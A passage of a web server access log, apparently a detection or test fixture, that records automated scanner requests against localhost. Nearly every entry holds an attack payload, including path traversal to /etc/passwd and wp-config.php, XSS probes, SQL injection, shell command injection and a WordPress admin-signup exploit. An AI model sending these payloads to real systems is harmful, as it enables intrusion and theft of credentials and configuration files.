HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-zoomsounds/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2f.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"\x221\x22:1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%2829KD26jQ1KNBWwI82YuVCQD65as%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A29KD1tuGFrU3jtR969scuu292Wg\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A29KD1tuGFrU3jtR969scuu292Wg@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A29KD1tuGFrU3jtR969scuu292Wg@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A29KD1tuGFrU3jtR969scuu292Wg@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A29KD1tuGFrU3jtR969scuu292Wg@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php/home/file/user_pics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"log=29KD1tuGFrU3jtR969scuu292Wg@example.com&pwd=29KD1tuGFrU3jtR969scuu292Wg@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 